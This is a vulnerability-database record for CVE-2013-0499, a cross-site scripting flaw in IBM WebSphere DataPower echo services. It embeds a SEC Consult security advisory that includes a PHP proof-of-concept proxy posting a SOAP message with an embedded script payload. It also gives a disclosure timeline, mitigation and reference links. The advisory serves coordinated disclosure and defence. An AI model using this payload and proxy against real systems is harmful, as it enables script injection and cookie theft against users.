"data": "Cross-site scripting (XSS) vulnerability in the echo functionality on IBM WebSphere DataPower SOA appliances with firmware 3.8.2, 4.0, 4.0.1, 4.0.2, and 5.0.0 allows remote attackers to inject arbitrary web script or HTML via a SOAP message, as demonstrated by the XML Firewall, Multi Protocol Gateway (MPGW), Web Service Proxy, and Web Token services. WebSphere DataPower SOA Appliances are prone to a cross-site scripting vulnerability. \nAn attacker may leverage this issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. IBM WebSphere DataPower SOA Appliances is a set of network equipment of IBM Corporation in the United States. The appliance is primarily used to simplify, secure and accelerate XML and Web services deployment in SOA. SEC Consult Vulnerability Lab Security Advisory \u003c 20130523-0 \u003e\n=======================================================================\n title: JavaScript Execution in WebSphere DataPower Services\n product: IBM WebSphere DataPower Integration Appliance XI50\n vulnerable version: 3.8.2, 4.0, 4.0.1, 4.0.2, 5.0.0\n fixed version: not available, config changes\n CVE number: CVE-2013-0499\n impact: Low/Medium\n homepage: https://www.ibm.com/\n found: 2013-01-28\n by: A. Falkenberg\n SEC Consult Vulnerability Lab\n https://www.sec-consult.com\n=======================================================================\n\nVendor/product description:\n-----------------------------\nWebSphere\u00ae DataPower\u00ae appliances simplify, govern, and optimize the delivery \nof services and applications and enhance the security of XML and IT services. \nThey extend the capabilities of an infrastructure by providing a multitude of\nfunctions. \nURL: http://www-03.ibm.com/software/products/us/en/datapower/\n\n\nVulnerability overview/description:\n-----------------------------------\nFor the purposes of debugging, DataPower provides configuration options to \necho requests received from the client. For example, XML Firewall service can\nbe configured to echo requests by choosing the backend as \u0027loopback\u0027. Other \nservices like Multi Protocol Gateway and Web Service Proxy can be configured \nto echo requests by setting the variable \u201cvar://service/mpgw/skip-backside\u201d in \nits processing policy. \nIn such configurations, the requests are not sent to a backend server. Without \nadequate validation and processing, the requests may be echoed back to the \nclient. Loopback services that blindly echo requests should only be used for \ndebugging purposes and not intended to be run in production environments as \nthey can result in potential security threats. For example, if an arbitrary \nJavaScript embedded request is sent to such services, they will simply echo it\nback resulting in a potential JavaScript execution vulnerability in the \nclient\u0027s browser. \nURL: https://www-304.ibm.com/support/docview.wss?uid=swg21637717\n\n\nProof of concept:\n-----------------\nThe proof of concept was tested on an IBM Xi50 with the backend configured as \na \"loopback\" Web Service. Any valid SOAP message sent \nto the Web service is returned unmodified to the receiver. If the SOAP \nresponse of the \"loopback\" Web Service is parsed by a browser, any JavaScript\nthat is contained within the XML document will get executed. \nThe following PHP script demonstrates a reflected cross site scripting. \n\n\u003c?php\n$soapEndpoint = \"http://127.0.0.1:80\";\n$soapMessage = \n\u0027\u003c?xml version=\"1.0\"?\u003e\u003csoapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:sam=\"http://sample02.policy.samples.rampart.apache.org\"\u003e\n \u003csoapenv:Header/\u003e\n \u003csoapenv:Body\u003e\n \u003csam:echo\u003e\n \u003chtml:html xmlns:html=\"http://www.w3.org/1999/xhtml\"\u003e\n \u003chtml:script\u003ealert(\"XML XSS\");\u003c/html:script\u003e\n \u003c/html:html\u003e\n \u003c/sam:echo\u003e\n \u003c/soapenv:Body\u003e\n\u003c/soapenv:Envelope\u003e\u0027;\n\nif(isset($_POST[\u0027soapMessage\u0027]) and isset($_POST[\u0027soapUrl\u0027])){\n$soap_do = curl_init(); \n\tcurl_setopt($soap_do, CURLOPT_URL, $_POST[\u0027soapUrl\u0027] ); \n\tcurl_setopt($soap_do, CURLOPT_CONNECTTIMEOUT, 10); \n\tcurl_setopt($soap_do, CURLOPT_TIMEOUT, 10); \n\tcurl_setopt($soap_do, CURLOPT_RETURNTRANSFER, true );\n\tcurl_setopt($soap_do, CURLOPT_SSL_VERIFYPEER, false); \n\tcurl_setopt($soap_do, CURLOPT_SSL_VERIFYHOST, false); \n\tcurl_setopt($soap_do, CURLOPT_POST, true ); \n\tcurl_setopt($soap_do, CURLOPT_POSTFIELDS, $_POST[\u0027soapMessage\u0027]); \n\tcurl_setopt($soap_do, CURLOPT_HTTPHEADER, array(\u0027Content-Type: text/xml; charset=utf-8\u0027, \u0027Content-Length: \u0027.strlen($_POST[\u0027soapMessage\u0027]) )); \n\n\t$result = curl_exec($soap_do);\n\t$err = curl_error($soap_do);\t\n\n header(\u0027Content-type: text/xml\u0027);\n\techo $result;\n exit;\n}\n?\u003e\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003ch1\u003eXSS XML Proxy\u003c/h1\u003e\n \u003cform name=\"input\" action=\"\" method=\"post\"\u003e\n SOAP Endpoint: \u003cinput type=\"text\" name=\"soapUrl\" value=\"\u003c?php echo $soapEndpoint; ?\u003e\"\u003e\u003cbr /\u003e\n SOAP Message:\u0026nbsp; \u003ctextarea cols=\"70\" name=\"soapMessage\" rows=\"14\"\u003e\u003c?php echo $soapMessage; ?\u003e\u003c/textarea\u003e\u003cbr /\u003e\n \u003cbr /\u003e\n \u003cinput type=\"submit\" value=\"Submit\"\u003e\n \u003c/form\u003e \n \u003c/body\u003e\n\u003c/html\u003e\n\n\n\nVulnerable / tested versions:\n-----------------------------\nSEC Consult verified the vulnerability in the WebSphere DataPower Appliance XI50. \nThe vendor provided an extended list of vulnerable versions: \nWebSphere DataPower 3.8.2, 4.0, 4.0.1, 4.0.2, 5.0.0. \n\n\n\nVendor contact timeline:\n------------------------\n2013-01-30: Sending advisory and proof of concept exploit via encrypted channel. \n2013-01-31: Vendor confirms receipt\n2013-05-17: Vendor posts security bulletin\n2013-05-23: SEC Consult releases coordinated security advisory. \n\n\nSolution:\n---------\nThe vendor does not offer a patch. \n\nThe vulnerability can be prevented by disabling the services to blindly echo\nrequests back. A detailed description can be found on the vendor\u0027s site:\nhttps://www-304.ibm.com/support/docview.wss?uid=swg21637717\n\n\n\nAdvisory URL:\n-------------\nhttps://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm\n\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nSEC Consult Unternehmensberatung GmbH\n\nOffice Vienna\nMooslackengasse 17\nA-1190 Vienna\nAustria\n\nTel.: +43 / 1 / 890 30 43 - 0\nFax.: +43 / 1 / 890 30 43 - 25\nMail: research at sec-consult dot com\nWeb: https://www.sec-consult.com\nBlog: http://blog.sec-consult.com\nTwitter: https://twitter.com/sec_consult\n\nEOF A. Falkenberg / @2013\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-0499"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-002845"
},
{
"db": "BID",
"id": "60027"
},
{
"db": "VULHUB",
"id": "VHN-60501"
},
{
"db": "PACKETSTORM",
"id": "121738"
}
],
"trust": 2.07
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-60501",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-60501"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-0499",
"trust": 2.9
},
{
"db": "BID",
"id": "60027",
"trust": 1.0
},
{
"db": "JVNDB",
"id": "JVNDB-2013-002845",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201305-593",
"trust": 0.7
},
{
"db": "XF",
"id": "82221",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20130523 SEC CONSULT SA-20130523-0 :: JAVASCRIPT EXECUTION IN IBM WEBSPHERE DATAPOWER SERVICES",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "121738",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-60501",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-60501"
},
{
"db": "BID",
"id": "60027"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-002845"
},
{
"db": "PACKETSTORM",
"id": "121738"
},
{
"db": "NVD",
"id": "CVE-2013-0499"
},
{
"db": "CNNVD",
"id": "CNNVD-201305-593"
}
]
},
"id": "VAR-201305-0236",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-60501"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T12:58:08.166000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "1637717",
"trust": 0.8,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21637717"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-002845"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-60501"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-002845"
},
{
"db": "NVD",
"id": "CVE-2013-0499"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130523-0_ibm_xi50_echo-webservice_xss_in_xml_v10.txt"
},
{
"trust": 1.7,
"url": "http://seclists.org/bugtraq/2013/may/83"
},
{
"trust": 1.7,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21637717"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/82221"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-0499"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-0499"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/82221"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/60027"
},
{
"trust": 0.1,
"url": "https://twitter.com/sec_consult"
},
{
"trust": 0.1,
"url": "https://www.ibm.com/"
},
{
"trust": 0.1,
"url": "http://127.0.0.1:80\";"
},
{
"trust": 0.1,
"url": "http://sample02.policy.samples.rampart.apache.org\"\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-0499"
},
{
"trust": 0.1,
"url": "https://www.sec-consult.com"
},
{
"trust": 0.1,
"url": "http://schemas.xmlsoap.org/soap/envelope/\""
},
{
"trust": 0.1,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21637717"
},
{
"trust": 0.1,
"url": "http://www-03.ibm.com/software/products/us/en/datapower/"
},
{
"trust": 0.1,
"url": "http://www.w3.org/1999/xhtml\"\u003e"
},
{
"trust": 0.1,
"url": "http://blog.sec-consult.com"
},
{
"trust": 0.1,
"url": "https://www.sec-consult.com/en/vulnerability-lab/advisories.htm"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-60501"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-002845"
},
{
"db": "PACKETSTORM",
"id": "121738"
},
{
"db": "NVD",
"id": "CVE-2013-0499"
},
{
"db": "CNNVD",
"id": "CNNVD-201305-593"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-60501"
},
{
"db": "BID",
"id": "60027"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-002845"
},
{
"db": "PACKETSTORM",
"id": "121738"
},
{
"db": "NVD",
"id": "CVE-2013-0499"
},
{
"db": "CNNVD",
"id": "CNNVD-201305-593"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-05-28T00:00:00",
"db": "VULHUB",
"id": "VHN-60501"
},
{
"date": "2013-05-17T00:00:00",
"db": "BID",
"id": "60027"
},
{
"date": "2013-05-30T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-002845"
},
{
"date": "2013-05-23T19:51:03",
"db": "PACKETSTORM",
"id": "121738"
},
{
"date": "2013-05-28T16:55:01.133000",
"db": "NVD",
"id": "CVE-2013-0499"
},
{
"date": "2013-05-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201305-593"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-08-29T00:00:00",
"db": "VULHUB",
"id": "VHN-60501"
},
{
"date": "2013-05-17T00:00:00",
"db": "BID",
"id": "60027"
},
{
"date": "2013-05-30T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-002845"
},
{
"date": "2017-08-29T01:33:03.857000",
"db": "NVD",
"id": "CVE-2013-0499"
},
{
"date": "2013-05-29T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201305-593"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201305-593"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "IBM WebSphere DataPower SOA Appliance cross-site scripting vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-002845"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "xss",
"sources": [
{
"db": "PACKETSTORM",
"id": "121738"
},
{
"db": "CNNVD",
"id": "CNNVD-201305-593"
}
],
"trust": 0.7
}
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.